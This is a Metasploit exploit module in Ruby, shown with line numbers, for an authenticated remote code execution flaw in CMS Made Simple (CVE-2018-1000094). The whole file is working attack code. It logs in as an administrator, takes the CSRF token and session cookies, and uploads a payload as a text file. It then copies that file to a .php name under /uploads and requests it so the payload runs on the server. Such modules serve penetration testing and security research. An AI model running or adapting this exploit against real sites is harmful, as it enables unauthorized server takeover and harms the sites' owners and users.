1
##
2
# This module requires Metasploit: https://metasploit.com/download
3
# Current source: https://github.com/rapid7/metasploit-framework
4
##
5

6
class MetasploitModule < Msf::Exploit::Remote
7
  Rank = ExcellentRanking
8

9
  include Msf::Exploit::Remote::HttpClient
10
  include Msf::Exploit::FileDropper
11
  prepend Msf::Exploit::Remote::AutoCheck
12

13
  def initialize(info = {})
14
    super(
15
      update_info(
16
        info,
17
        'Name' => 'CMS Made Simple Authenticated RCE via File Upload/Copy',
18
        'Description' => %q{
19
          CMS Made Simple allows an authenticated administrator to upload a file
20
          and rename it to have a .php extension. The file can then be executed
21
          by opening the URL of the file in the /uploads/ directory.
22

23
          This module has been successfully tested on CMS Made Simple versions
24
          2.2.5 and 2.2.7.
25
        },
26
        'Author' => [
27
          'Mustafa Hasen', # Vulnerability discovery and EDB PoC
28
          'Jacob Robles' # Metasploit Module
29
        ],
30
        'License' => MSF_LICENSE,
31
        'References' => [
32
          [ 'CVE', '2018-1000094' ],
33
          [ 'CWE', '434' ],
34
          [ 'EDB', '44976' ],
35
          [ 'URL', 'http://dev.cmsmadesimple.org/bug/view/11741' ]
36
        ],
37
        'Privileged' => false,
38
        'Platform' => [ 'php' ],
39
        'Arch' => ARCH_PHP,
40
        'Targets' => [
41
          [ 'Universal', {} ],
42
        ],
43
        'DefaultTarget' => 0,
44
        'DisclosureDate' => '2018-07-03',
45
        'Notes' => {
46
          'Reliability' => UNKNOWN_RELIABILITY,
47
          'Stability' => UNKNOWN_STABILITY,
48
          'SideEffects' => UNKNOWN_SIDE_EFFECTS
49
        }
50
      )
51
    )
52

53
    register_options(
54
      [
55
        OptString.new('TARGETURI', [ true, "Base cmsms directory path", '/cmsms/']),
56
        OptString.new('USERNAME', [ true, "Username to authenticate with", '']),
57
        OptString.new('PASSWORD', [ true, "Password to authenticate with", ''])
58
      ]
59
    )
60
  end
61

62
  def check
63
    res = send_request_cgi({
64
      'uri' => normalize_uri(target_uri.path),
65
      'method' => 'GET'
66
    })
67

68
    unless res
69
      vprint_error 'Connection failed'
70
      return CheckCode::Unknown
71
    end
72

73
    unless res.body =~ /CMS Made Simple/i
74
      return CheckCode::Safe
75
    end
76

77
    if res.body =~ %r{CMS Made Simple</a> version (\d+\.\d+\.\d+)}i
78
      version = Rex::Version.new($1)
79
      vprint_status("#{peer} - CMS Made Simple Version: #{version}")
80

81
      if version == Rex::Version.new('2.2.5')
82
        return CheckCode::Appears
83
      end
84
    end
85

86
    CheckCode::Detected
87
  end
88

89
  def exploit
90
    res = send_request_cgi({
91
      'uri' => normalize_uri(target_uri.path, 'admin', 'login.php'),
92
      'method' => 'POST',
93
      'vars_post' => {
94
        'username' => datastore['USERNAME'],
95
        'password' => datastore['PASSWORD'],
96
        'loginsubmit' => 'Submit'
97
      }
98
    })
99
    unless res
100
      fail_with(Failure::NotFound, 'A response was not received from the remote host')
101
    end
102

103
    unless res.code == 302 && res.get_cookies && res.headers['Location'] =~ /\/admin\?(.*)?=(.*)/
104
      fail_with(Failure::NoAccess, 'Authentication was unsuccessful')
105
    end
106

107
    vprint_good("#{peer} - Authentication successful")
108
    csrf_name = $1
109
    csrf_val = $2
110

111
    csrf = { csrf_name => csrf_val }
112
    cookies = res.get_cookies
113
    filename = rand_text_alpha(8..12)
114

115
    # Generate form data
116
    message = Rex::MIME::Message.new
117
    message.add_part(csrf[csrf_name], nil, nil, "form-data; name=\"#{csrf_name}\"")
118
    message.add_part('FileManager,m1_,upload,0', nil, nil, 'form-data; name="mact"')
119
    message.add_part('1', nil, nil, 'form-data; name="disable_buffer"')
120
    message.add_part(payload.encoded, nil, nil, "form-data; name=\"m1_files[]\"; filename=\"#{filename}.txt\"")
121
    data = message.to_s
122

123
    res = send_request_cgi({
124
      'uri' => normalize_uri(target_uri.path, 'admin', 'moduleinterface.php'),
125
      'method' => 'POST',
126
      'data' => data,
127
      'ctype' => "multipart/form-data; boundary=#{message.bound}",
128
      'cookie' => cookies
129
    })
130

131
    unless res && res.code == 200
132
      fail_with(Failure::UnexpectedReply, 'Failed to upload the text file')
133
    end
134
    vprint_good("#{peer} - File uploaded #{filename}.txt")
135

136
    fileb64 = Rex::Text.encode_base64("#{filename}.txt")
137
    data = {
138
      'mact' => 'FileManager,m1_,fileaction,0',
139
      "m1_fileactioncopy" => "",
140
      'm1_selall' => "a:1:{i:0;s:#{fileb64.length}:\"#{fileb64}\";}",
141
      'm1_destdir' => '/',
142
      'm1_destname' => "#{filename}.php",
143
      'm1_path' => '/uploads',
144
      'm1_submit' => 'Copy',
145
      csrf_name => csrf_val
146
    }
147

148
    res = send_request_cgi({
149
      'uri' => normalize_uri(target_uri.path, 'admin', 'moduleinterface.php'),
150
      'method' => 'POST',
151
      'cookie' => cookies,
152
      'vars_post' => data
153
    })
154

155
    unless res
156
      fail_with(Failure::NotFound, 'A response was not received from the remote host')
157
    end
158

159
    unless res.code == 302 && res.headers['Location'].to_s.include?('copysuccess')
160
      fail_with(Failure::UnexpectedReply, 'Failed to rename the file')
161
    end
162
    vprint_good("#{peer} - File renamed #{filename}.php")
163

164
    register_files_for_cleanup("#{filename}.txt", "#{filename}.php")
165

166
    res = send_request_cgi({
167
      'uri' => normalize_uri(target_uri.path, 'uploads', "#{filename}.php"),
168
      'method' => 'GET',
169
      'cookie' => cookies
170
    })
171
  end
172
end
173

174